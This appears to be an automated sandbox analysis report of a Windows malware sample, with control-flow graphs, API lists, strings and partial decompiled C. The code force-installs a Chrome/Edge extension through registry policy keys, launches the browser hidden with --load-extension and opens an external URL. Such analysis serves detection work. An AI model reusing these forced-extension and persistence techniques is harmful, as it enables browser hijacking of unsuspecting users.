                                                                                                control_flow_graph 1516 1001ba6-1001bd3 call 1002b10 GetFileAttributesW 1520 1001bd9-1001c1f 1516->1520 1521 1001c6d-1001c83 FindNextFileW 1516->1521 1522 1001c25-1001c6b 1520->1522 1523 1001c89-1001e3c call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 1521->1523 1524 1001b7b-1001b96 call 1002b60 1521->1524 1522->1521 1522->1522 1559 1001e4d-1001e59 1523->1559 1524->1521 1560 1001ed2-1001edd Sleep 1559->1560 1561 1001e5b 1559->1561 1564 1001ee2-1001efc call 1001270 1560->1564 1565 1001edf 1560->1565 1562 1001e60-1001e8f call 1002b10 1561->1562 1563 1001e5d 1561->1563 1572 1001e91 1562->1572 1573 1001e94-1001e9b 1562->1573 1563->1562 1566 1001e5f 1563->1566 1574 1001f00-1001f30 call 1001270 Sleep call 1001330 1564->1574 1575 1001efe 1564->1575 1565->1564 1568 1001ee1 1565->1568 1566->1562 1568->1564 1572->1573 1577 1001e93 1572->1577 1578 1001ecd 1573->1578 1579 1001e9d 1573->1579 1593 1001f35 1574->1593 1575->1574 1582 1002050-1002058 1577->1582 1578->1559 1583 1001ea2-1001eb2 GetFileAttributesW 1579->1583 1584 1001e9f 1579->1584 1585 100205a-1002070 1582->1585 1586 100207e-1002083 1582->1586 1589 1001eb4 1583->1589 1590 1001ebb 1583->1590 1584->1583 1588 1001ea1 1584->1588 1591 1002072-100207c 1585->1591 1592 1002018-1002031 1585->1592 1596 1002089-100209c 1586->1596 1588->1583 1597 1001eb6 1589->1597 1598 1001eb9 1589->1598 1594 1001ec0-1001ecb Sleep 1590->1594 1595 1001ebd 1590->1595 1591->1596 1592->1586 1605 1002033-100203b 1592->1605 1600 1001f37 1593->1600 1601 1001f3b-1001f4a call 1002b7c 1593->1601 1594->1573 1595->1594 1602 1001ebf 1595->1602 1603 10020a2-10020b2 1596->1603 1604 100215f-1002175 FindNextFileW 1596->1604 1597->1598 1599 1001eb8 1597->1599 1598->1578 1599->1598 1600->1601 1606 1001f39 1600->1606 1602->1594 1607 10020b8-10020d1 1603->1607 1609 1001ff5-1001ffc 1604->1609 1610 100217b-10021df FindClose call 1007be0 call 1002b10 GetFileAttributesW 1604->1610 1605->1591 1611 100203d-100204e 1605->1611 1606->1601 1612 10020d3-10020db 1607->1612 1613 100211e-1002123 1607->1613 1609->1604 1616 1002002-1002012 1609->1616 1632 10021ed-1002554 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 1610->1632 1611->1582 1617 1002112-100211c 1612->1617 1618 10020dd-10020f8 1612->1618 1620 1002129-100213c 1613->1620 1616->1592 1617->1620 1618->1613 1622 10020fa-1002110 1618->1622 1620->1604 1623 100213e 1620->1623 1622->1607 1622->1617 1625 1002140 1623->1625 1626 1002144-100215a call 1002b40 1623->1626 1625->1626 1628 1002142 1625->1628 1626->1604 1637 100215c 1626->1637 1628->1626 1661 1002559-1002670 call 1002b60 FindNextFileW 1632->1661 1637->1604 1639 100215e 1637->1639 1639->1604 1666 1002676-100281e call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 1661->1666 1697 100282f-100283b 1666->1697 1698 10028b9 1697->1698 1699 100283d-100283e 1697->1699 1702 10028bb 1698->1702 1703 10028be-10028ca Sleep 1698->1703 1700 1002840 1699->1700 1701 1002842-1002871 call 1002b10 1699->1701 1700->1701 1711 1002873 1701->1711 1712 1002876-10028b4 1701->1712 1702->1703 1705 10028bd 1702->1705 1706 10028cc 1703->1706 1707 10028ce-1002900 call 1001270 * 2 1703->1707 1705->1703 1706->1707 1719 1002902 1707->1719 1720 1002906-1002912 Sleep 1707->1720 1711->1712 1714 1002875 call 1002a33 1711->1714 1712->1697 1714->1712 1719->1720 1721 1002904 1719->1721 1722 1002914 1720->1722 1723 1002916-1002928 call 1001330 1720->1723 1721->1720 1722->1723 1726 100292a 1723->1726 1727 100292c-100293b call 1002b7c 1723->1727 1726->1727
                                                                                                APIs
                                                                                                  • Part of subcall function 01002B10: _vswprintf_s.LIBCMT ref: 01002B2B
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 01001BCA
                                                                                                • FindNextFileW.KERNELBASE(?,?), ref: 01001C7B
                                                                                                Strings
                                                                                                • %s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001BAF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesFindNext_vswprintf_s
                                                                                                • String ID: %s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma
                                                                                                • API String ID: 1347245878-4178013715
                                                                                                • Opcode ID: 40b11e7699c7ab7cb3b1e66d433001b8788d7e2b2fdf38f85b95fb0c1a58027e
                                                                                                • Instruction ID: 8456703fee4f013905a361942687234e980df3fa605a61dce7f0bbedb83961d5
                                                                                                • Opcode Fuzzy Hash: 40b11e7699c7ab7cb3b1e66d433001b8788d7e2b2fdf38f85b95fb0c1a58027e
                                                                                                • Instruction Fuzzy Hash: C6210CF09482189BDB76DF64D8899A9B3B9FF58311F0085D9D45DA7294EB309B80DF00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1731 1001dd8-1001e02 call 1002b10 1735 1001e04 1731->1735 1736 1001e07-1001e26 ShellExecuteW 1731->1736 1735->1736 1737 1001e06 1735->1737 1738 1001e28 1736->1738 1739 1001e2b-1001e3c 1736->1739 1737->1736 1738->1739 1741 1001e2a 1738->1741 1745 1001e4d-1001e59 1739->1745 1741->1739 1746 1001ed2-1001edd Sleep 1745->1746 1747 1001e5b 1745->1747 1750 1001ee2-1001efc call 1001270 1746->1750 1751 1001edf 1746->1751 1748 1001e60-1001e8f call 1002b10 1747->1748 1749 1001e5d 1747->1749 1758 1001e91 1748->1758 1759 1001e94-1001e9b 1748->1759 1749->1748 1752 1001e5f 1749->1752 1760 1001f00-1001f30 call 1001270 Sleep call 1001330 1750->1760 1761 1001efe 1750->1761 1751->1750 1754 1001ee1 1751->1754 1752->1748 1754->1750 1758->1759 1763 1001e93 1758->1763 1764 1001ecd 1759->1764 1765 1001e9d 1759->1765 1779 1001f35 1760->1779 1761->1760 1768 1002050-1002058 1763->1768 1764->1745 1769 1001ea2-1001eb2 GetFileAttributesW 1765->1769 1770 1001e9f 1765->1770 1771 100205a-1002070 1768->1771 1772 100207e-1002083 1768->1772 1775 1001eb4 1769->1775 1776 1001ebb 1769->1776 1770->1769 1774 1001ea1 1770->1774 1777 1002072-100207c 1771->1777 1778 1002018-1002031 1771->1778 1782 1002089-100209c 1772->1782 1774->1769 1783 1001eb6 1775->1783 1784 1001eb9 1775->1784 1780 1001ec0-1001ecb Sleep 1776->1780 1781 1001ebd 1776->1781 1777->1782 1778->1772 1791 1002033-100203b 1778->1791 1786 1001f37 1779->1786 1787 1001f3b-1001f4a call 1002b7c 1779->1787 1780->1759 1781->1780 1788 1001ebf 1781->1788 1789 10020a2-10020b2 1782->1789 1790 100215f-1002175 FindNextFileW 1782->1790 1783->1784 1785 1001eb8 1783->1785 1784->1764 1785->1784 1786->1787 1792 1001f39 1786->1792 1788->1780 1793 10020b8-10020d1 1789->1793 1795 1001ff5-1001ffc 1790->1795 1796 100217b-10021df FindClose call 1007be0 call 1002b10 GetFileAttributesW 1790->1796 1791->1777 1797 100203d-100204e 1791->1797 1792->1787 1798 10020d3-10020db 1793->1798 1799 100211e-1002123 1793->1799 1795->1790 1802 1002002-1002012 1795->1802 1818 10021ed-1002554 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 1796->1818 1797->1768 1803 1002112-100211c 1798->1803 1804 10020dd-10020f8 1798->1804 1806 1002129-100213c 1799->1806 1802->1778 1803->1806 1804->1799 1808 10020fa-1002110 1804->1808 1806->1790 1809 100213e 1806->1809 1808->1793 1808->1803 1811 1002140 1809->1811 1812 1002144-100215a call 1002b40 1809->1812 1811->1812 1814 1002142 1811->1814 1812->1790 1823 100215c 1812->1823 1814->1812 1847 1002559-1002670 call 1002b60 FindNextFileW 1818->1847 1823->1790 1825 100215e 1823->1825 1825->1790 1852 1002676-100281e call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 1847->1852 1883 100282f-100283b 1852->1883 1884 10028b9 1883->1884 1885 100283d-100283e 1883->1885 1888 10028bb 1884->1888 1889 10028be-10028ca Sleep 1884->1889 1886 1002840 1885->1886 1887 1002842-1002871 call 1002b10 1885->1887 1886->1887 1897 1002873 1887->1897 1898 1002876-10028b4 1887->1898 1888->1889 1891 10028bd 1888->1891 1892 10028cc 1889->1892 1893 10028ce-1002900 call 1001270 * 2 1889->1893 1891->1889 1892->1893 1905 1002902 1893->1905 1906 1002906-1002912 Sleep 1893->1906 1897->1898 1900 1002875 call 1002a33 1897->1900 1898->1883 1900->1898 1905->1906 1907 1002904 1905->1907 1908 1002914 1906->1908 1909 1002916-1002928 call 1001330 1906->1909 1907->1906 1908->1909 1912 100292a 1909->1912 1913 100292c-100293b call 1002b7c 1909->1913 1912->1913
                                                                                                APIs
                                                                                                  • Part of subcall function 01002B10: _vswprintf_s.LIBCMT ref: 01002B2B
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000005), ref: 01001E20
                                                                                                Strings
                                                                                                • --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble, xrefs: 01001DEE
                                                                                                • open, xrefs: 01001E19
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell_vswprintf_s
                                                                                                • String ID: --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble$open
                                                                                                • API String ID: 1340072267-2168600038
                                                                                                • Opcode ID: c5cfdbdfa602968e13fbdcda4981a58bca4971dfcf169530479fd1f14f9d1126
                                                                                                • Instruction ID: c04677b4738fd236cf66f5271b77c8f9d1a0191cac1b1f8a23dfefd252a7cbac
                                                                                                • Opcode Fuzzy Hash: c5cfdbdfa602968e13fbdcda4981a58bca4971dfcf169530479fd1f14f9d1126
                                                                                                • Instruction Fuzzy Hash: F411D6B08042A9AAFB77EA58CC54AED7778FB54710F0042C9E199570D1C770EF848F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1917 1002199-10021a4 1918 10021aa-10021df call 1002b10 GetFileAttributesW 1917->1918 1919 10021a5 call 1007be0 1917->1919 1922 10021ed-1002554 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 1918->1922 1919->1918 1947 1002559-1002670 call 1002b60 FindNextFileW 1922->1947 1952 1002676-100281e call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 1947->1952 1983 100282f-100283b 1952->1983 1984 10028b9 1983->1984 1985 100283d-100283e 1983->1985 1988 10028bb 1984->1988 1989 10028be-10028ca Sleep 1984->1989 1986 1002840 1985->1986 1987 1002842-1002871 call 1002b10 1985->1987 1986->1987 1997 1002873 1987->1997 1998 1002876-10028b4 1987->1998 1988->1989 1991 10028bd 1988->1991 1992 10028cc 1989->1992 1993 10028ce-1002900 call 1001270 * 2 1989->1993 1991->1989 1992->1993 2005 1002902 1993->2005 2006 1002906-1002912 Sleep 1993->2006 1997->1998 2000 1002875 call 1002a33 1997->2000 1998->1983 2000->1998 2005->2006 2007 1002904 2005->2007 2008 1002914 2006->2008 2009 1002916-1002928 call 1001330 2006->2009 2007->2006 2008->2009 2012 100292a 2009->2012 2013 100292c-100293b call 1002b7c 2009->2013 2012->2013
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 010021A5
                                                                                                  • Part of subcall function 01002B10: _vswprintf_s.LIBCMT ref: 01002B2B
                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 010021D6
                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist,00000000,000F003F,?), ref: 0100220A
                                                                                                Strings
                                                                                                • %s\Microsoft\EdgeCore\%s\msedge.exe, xrefs: 010021BB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFileOpen_memset_vswprintf_s
                                                                                                • String ID: %s\Microsoft\EdgeCore\%s\msedge.exe
                                                                                                • API String ID: 588096412-3013233320
                                                                                                • Opcode ID: d87cdfb1e909230015fd6b3c274c7dffd01c71396a3c76a589377b5eb73d2fe5
                                                                                                • Instruction ID: 45151a1dd600f83b42c879474731a292c9acc28561210e21500c370050638885
                                                                                                • Opcode Fuzzy Hash: d87cdfb1e909230015fd6b3c274c7dffd01c71396a3c76a589377b5eb73d2fe5
                                                                                                • Instruction Fuzzy Hash: F2F0E9F58082504ADB37E7685C548F8777DBB24230F480BC8F6FA420C2D6359784D751
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2017 10019d1-10019f7 RegOpenKeyExW 2019 1001a27-1001b75 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 2017->2019 2020 10019f9-10019fa 2017->2020 2038 1001b7b-1001c83 call 1002b60 FindNextFileW 2019->2038 2021 10019fc-1001a11 RegDeleteKeyW 2020->2021 2022 10019fe-1001a11 RegDeleteKeyW 2020->2022 2024 1001a13-1001a18 2021->2024 2025 1001a15-1001a23 RegCloseKey 2021->2025 2022->2024 2022->2025 2025->2019 2029 1001a25 2025->2029 2029->2019 2043 1001c89-1001e3c call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 2038->2043 2075 1001e4d-1001e59 2043->2075 2076 1001ed2-1001edd Sleep 2075->2076 2077 1001e5b 2075->2077 2080 1001ee2-1001efc call 1001270 2076->2080 2081 1001edf 2076->2081 2078 1001e60-1001e8f call 1002b10 2077->2078 2079 1001e5d 2077->2079 2088 1001e91 2078->2088 2089 1001e94-1001e9b 2078->2089 2079->2078 2082 1001e5f 2079->2082 2090 1001f00-1001f30 call 1001270 Sleep call 1001330 2080->2090 2091 1001efe 2080->2091 2081->2080 2084 1001ee1 2081->2084 2082->2078 2084->2080 2088->2089 2093 1001e93 2088->2093 2094 1001ecd 2089->2094 2095 1001e9d 2089->2095 2109 1001f35 2090->2109 2091->2090 2098 1002050-1002058 2093->2098 2094->2075 2099 1001ea2-1001eb2 GetFileAttributesW 2095->2099 2100 1001e9f 2095->2100 2101 100205a-1002070 2098->2101 2102 100207e-1002083 2098->2102 2105 1001eb4 2099->2105 2106 1001ebb 2099->2106 2100->2099 2104 1001ea1 2100->2104 2107 1002072-100207c 2101->2107 2108 1002018-1002031 2101->2108 2112 1002089-100209c 2102->2112 2104->2099 2113 1001eb6 2105->2113 2114 1001eb9 2105->2114 2110 1001ec0-1001ecb Sleep 2106->2110 2111 1001ebd 2106->2111 2107->2112 2108->2102 2121 1002033-100203b 2108->2121 2116 1001f37 2109->2116 2117 1001f3b-1001f4a call 1002b7c 2109->2117 2110->2089 2111->2110 2118 1001ebf 2111->2118 2119 10020a2-10020b2 2112->2119 2120 100215f-1002175 FindNextFileW 2112->2120 2113->2114 2115 1001eb8 2113->2115 2114->2094 2115->2114 2116->2117 2122 1001f39 2116->2122 2118->2110 2123 10020b8-10020d1 2119->2123 2125 1001ff5-1001ffc 2120->2125 2126 100217b-10021df FindClose call 1007be0 call 1002b10 GetFileAttributesW 2120->2126 2121->2107 2127 100203d-100204e 2121->2127 2122->2117 2128 10020d3-10020db 2123->2128 2129 100211e-1002123 2123->2129 2125->2120 2132 1002002-1002012 2125->2132 2148 10021ed-1002554 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 2126->2148 2127->2098 2133 1002112-100211c 2128->2133 2134 10020dd-10020f8 2128->2134 2136 1002129-100213c 2129->2136 2132->2108 2133->2136 2134->2129 2138 10020fa-1002110 2134->2138 2136->2120 2139 100213e 2136->2139 2138->2123 2138->2133 2141 1002140 2139->2141 2142 1002144-100215a call 1002b40 2139->2142 2141->2142 2144 1002142 2141->2144 2142->2120 2153 100215c 2142->2153 2144->2142 2177 1002559-1002670 call 1002b60 FindNextFileW 2148->2177 2153->2120 2155 100215e 2153->2155 2155->2120 2182 1002676-100281e call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 2177->2182 2213 100282f-100283b 2182->2213 2214 10028b9 2213->2214 2215 100283d-100283e 2213->2215 2218 10028bb 2214->2218 2219 10028be-10028ca Sleep 2214->2219 2216 1002840 2215->2216 2217 1002842-1002871 call 1002b10 2215->2217 2216->2217 2227 1002873 2217->2227 2228 1002876-10028b4 2217->2228 2218->2219 2221 10028bd 2218->2221 2222 10028cc 2219->2222 2223 10028ce-1002900 call 1001270 * 2 2219->2223 2221->2219 2222->2223 2235 1002902 2223->2235 2236 1002906-1002912 Sleep 2223->2236 2227->2228 2230 1002875 call 1002a33 2227->2230 2228->2213 2230->2228 2235->2236 2237 1002904 2235->2237 2238 1002914 2236->2238 2239 1002916-1002928 call 1001330 2236->2239 2237->2236 2238->2239 2242 100292a 2239->2242 2243 100292c-100293b call 1002b7c 2239->2243 2242->2243
                                                                                                C-Code - Quality: 28%
                                                                                                			E010019D1(signed char __ebx, void* __ecx, intOrPtr* __edx, intOrPtr* __edi, intOrPtr __esi) {
                                                                                                				long _t250;
                                                                                                				void* _t254;
                                                                                                				intOrPtr _t255;
                                                                                                				long _t257;
                                                                                                				void* _t258;
                                                                                                				int _t259;
                                                                                                				intOrPtr _t260;
                                                                                                				void* _t270;
                                                                                                				signed int _t274;
                                                                                                				short _t277;
                                                                                                				signed int _t282;
                                                                                                				short _t284;
                                                                                                				long _t291;
                                                                                                				void* _t292;
                                                                                                				intOrPtr _t316;
                                                                                                				short _t345;
                                                                                                				short _t348;
                                                                                                				void* _t355;
                                                                                                				void* _t374;
                                                                                                				signed char _t376;
                                                                                                				void* _t385;
                                                                                                				void* _t386;
                                                                                                				intOrPtr _t390;
                                                                                                				void* _t391;
                                                                                                				void* _t399;
                                                                                                				intOrPtr _t432;
                                                                                                				void* _t439;
                                                                                                				signed int _t441;
                                                                                                				void* _t442;
                                                                                                				void* _t443;
                                                                                                				WCHAR* _t445;
                                                                                                				void* _t462;
                                                                                                				intOrPtr* _t478;
                                                                                                				intOrPtr _t479;
                                                                                                				signed int _t481;
                                                                                                				void* _t484;
                                                                                                				void* _t485;
                                                                                                				void* _t486;
                                                                                                				void* _t487;
                                                                                                				void* _t488;
                                                                                                				void* _t490;
                                                                                                				void* _t492;
                                                                                                				long _t496;
                                                                                                				void* _t497;
                                                                                                				short _t499;
                                                                                                				void* _t500;
                                                                                                				int _t504;
                                                                                                
                                                                                                				_t479 = __esi;
                                                                                                				_t478 = __edi;
                                                                                                				_t376 = __ebx;
                                                                                                				 *((intOrPtr*)(__ecx + 0x68))();
                                                                                                				asm("aas");
                                                                                                				 *__edi =  *__edi + __ecx;
                                                                                                				 *__edx =  *__edx + __ecx;
                                                                                                				_t250 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions", ??, ??, ??); // executed
                                                                                                				 *(_t481 - 0x3540) = _t250;
                                                                                                				_t496 =  *(_t481 - 0x3540);
                                                                                                				if(_t496 == 0) {
                                                                                                					asm("clc");
                                                                                                					if(_t496 < 0) {
                                                                                                						0xf99082e9();
                                                                                                					}
                                                                                                					RegDeleteKeyW( *(_t481 - 0x214), L"ecffbknobglofafinobbcmaionnihcma");
                                                                                                					asm("clc");
                                                                                                					if(_t496 < 0) {
                                                                                                						0xed85a600();
                                                                                                					}
                                                                                                					_t374 =  *(_t481 - 0x214);
                                                                                                					 *((intOrPtr*)(_t374 - 1))();
                                                                                                					asm("adc eax, 0x101d274");
                                                                                                					asm("clc");
                                                                                                					if(_t496 < 0) {
                                                                                                						0x80039912();
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t496 > 0 && _t496 <= 0) {
                                                                                                					0x16a1f9a();
                                                                                                				}
                                                                                                				_t378 = _t481 - 0x420;
                                                                                                				ShellExecuteW(0, L"open", _t481 - 0x420, L" https://getfiles.wiki/welcome.php", 0, 5); // executed
                                                                                                				asm("clc");
                                                                                                				if(_t496 < 0) {
                                                                                                					0x1c588339();
                                                                                                				}
                                                                                                				Sleep(0x1b58); // executed
                                                                                                				if(_t496 != 0 && _t496 == 0) {
                                                                                                				}
                                                                                                				_t432 =  *0x101d264; // 0x145f9e0
                                                                                                				E01002B10(_t378, _t481 - 0x210, L"%s\\Google\\Chrome\\User Data\\*.*", _t432);
                                                                                                				_t485 = _t484 + 0xc;
                                                                                                				if(_t496 != 0 && _t496 == 0) {
                                                                                                				}
                                                                                                				_t254 = FindFirstFileW(_t481 - 0x210, _t481 - 0xa88); // executed
                                                                                                				 *(_t481 - 0x332c) = _t254;
                                                                                                				if(_t496 != 0 && _t496 == 0) {
                                                                                                				}
                                                                                                				 *(_t481 - 0x353c) = 0;
                                                                                                				_t255 =  *0x101d264; // 0x145f9e0
                                                                                                				_t380 = _t481 - 0x210;
                                                                                                				E01002B10(_t481 - 0x210, _t481 - 0x210, L"%s\\Google\\Chrome\\User Data\\Default\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t255);
                                                                                                				_t486 = _t485 + 0xc;
                                                                                                				_t257 = GetFileAttributesW(_t481 - 0x210); // executed
                                                                                                				_t497 = _t257 - 0xffffffff;
                                                                                                				if(_t497 == 0) {
                                                                                                					if(_t497 != 0 && _t497 == 0) {
                                                                                                						0xffc8();
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_t481 - 0x3764)) = L"Default";
                                                                                                					 *(_t481 - 0x3768) = _t481 +  *(_t481 - 0x353c) * 0x208 - 0x3328;
                                                                                                					 *(_t481 - 0x376c) =  *(_t481 - 0x3768);
                                                                                                					 *(_t481 - 0x353c) =  *(_t481 - 0x353c) + 1;
                                                                                                					 *(_t481 - 0x3770) =  *(_t481 - 0x376c);
                                                                                                					do {
                                                                                                						 *((short*)(_t481 - 0x3772)) =  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3764))));
                                                                                                						 *( *(_t481 - 0x376c)) =  *((intOrPtr*)(_t481 - 0x3772));
                                                                                                						 *((intOrPtr*)(_t481 - 0x3764)) =  *((intOrPtr*)(_t481 - 0x3764)) + 2;
                                                                                                						_t380 =  &( *(_t481 - 0x376c)->dwFileAttributes);
                                                                                                						 *(_t481 - 0x376c) =  &( *(_t481 - 0x376c)->dwFileAttributes);
                                                                                                						_t499 =  *((short*)(_t481 - 0x3772));
                                                                                                					} while (_t499 != 0);
                                                                                                					if(_t499 != 0 && _t499 == 0) {
                                                                                                						0x9a02();
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t499 != 0 && _t499 == 0) {
                                                                                                					0xe801();
                                                                                                				}
                                                                                                				do {
                                                                                                					if(_t499 != 0 && _t499 == 0) {
                                                                                                						0x1fa2bec();
                                                                                                					}
                                                                                                					_t258 = E01002B60(_t481 - 0xa5c, L"Profile ");
                                                                                                					_t486 = _t486 + 8;
                                                                                                					_t500 = _t258;
                                                                                                					if(_t500 != 0) {
                                                                                                						asm("clc");
                                                                                                						if(_t500 < 0) {
                                                                                                							0xa585a98c();
                                                                                                						}
                                                                                                						_t355 = _t481 - 0xa5c;
                                                                                                						 *((intOrPtr*)(_t355 - 0x75))();
                                                                                                						E01002B10(_t380, _t481 - 0x210, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t380);
                                                                                                						_t486 = _t486 + 0x10;
                                                                                                						if(GetFileAttributesW(_t481 - 0x210) == 0xffffffff) {
                                                                                                							 *((intOrPtr*)(_t481 - 0x3778)) = _t481 - 0xa5c;
                                                                                                							 *((intOrPtr*)(_t481 - 0x377c)) = _t481 +  *(_t481 - 0x353c) * 0x208 - 0x3328;
                                                                                                							 *((intOrPtr*)(_t481 - 0x3780)) =  *((intOrPtr*)(_t481 - 0x377c));
                                                                                                							 *(_t481 - 0x353c) =  *(_t481 - 0x353c) + 1;
                                                                                                							 *((intOrPtr*)(_t481 - 0x3784)) =  *((intOrPtr*)(_t481 - 0x3780));
                                                                                                							do {
                                                                                                								 *((short*)(_t481 - 0x3786)) =  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3778))));
                                                                                                								 *((short*)( *((intOrPtr*)(_t481 - 0x3780)))) =  *((intOrPtr*)(_t481 - 0x3786));
                                                                                                								 *((intOrPtr*)(_t481 - 0x3778)) =  *((intOrPtr*)(_t481 - 0x3778)) + 2;
                                                                                                								 *((intOrPtr*)(_t481 - 0x3780)) =  *((intOrPtr*)(_t481 - 0x3780)) + 2;
                                                                                                							} while ( *((short*)(_t481 - 0x3786)) != 0);
                                                                                                						}
                                                                                                					}
                                                                                                					_t380 = _t481 - 0xa88;
                                                                                                					_t436 =  *(_t481 - 0x332c);
                                                                                                					_t259 = FindNextFileW( *(_t481 - 0x332c), _t481 - 0xa88); // executed
                                                                                                					_t504 = _t259;
                                                                                                				} while (_t504 != 0);
                                                                                                				if(_t504 != 0 && _t504 == 0) {
                                                                                                					0xffca();
                                                                                                				}
                                                                                                				if( *(_t481 - 0x353c) != 0) {
                                                                                                					if(__eflags > 0 && __eflags <= 0) {
                                                                                                						0x2d28149();
                                                                                                					}
                                                                                                					_t260 =  *0x101d264; // 0x145f9e0
                                                                                                					_t385 = _t481 - 0x3538;
                                                                                                					E01002B10(_t385, _t385, L"%s\\ServiceApp\\apps-helper", _t260);
                                                                                                					_t487 = _t486 + 0xc;
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xc995aaae();
                                                                                                					}
                                                                                                					E01002B10(_t385, _t481 - 0x3748, L"%s\\edge.crx", _t481 - 0x3538);
                                                                                                					_t488 = _t487 + 0xc;
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xfc8085ce();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallAllowlist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
                                                                                                					if(__eflags != 0) {
                                                                                                						if (__eflags != 0) goto L61;
                                                                                                						__eflags = _t385 + _t481;
                                                                                                					}
                                                                                                					_t386 = _t481 - 0x3748;
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t386); // executed
                                                                                                					if(__eflags != 0 && __eflags == 0) {
                                                                                                						0x100();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xb995ab2b();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t481 - 0x3748); // executed
                                                                                                					if(__eflags != 0 && __eflags == 0) {
                                                                                                						0x100();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
                                                                                                					asm("clc");
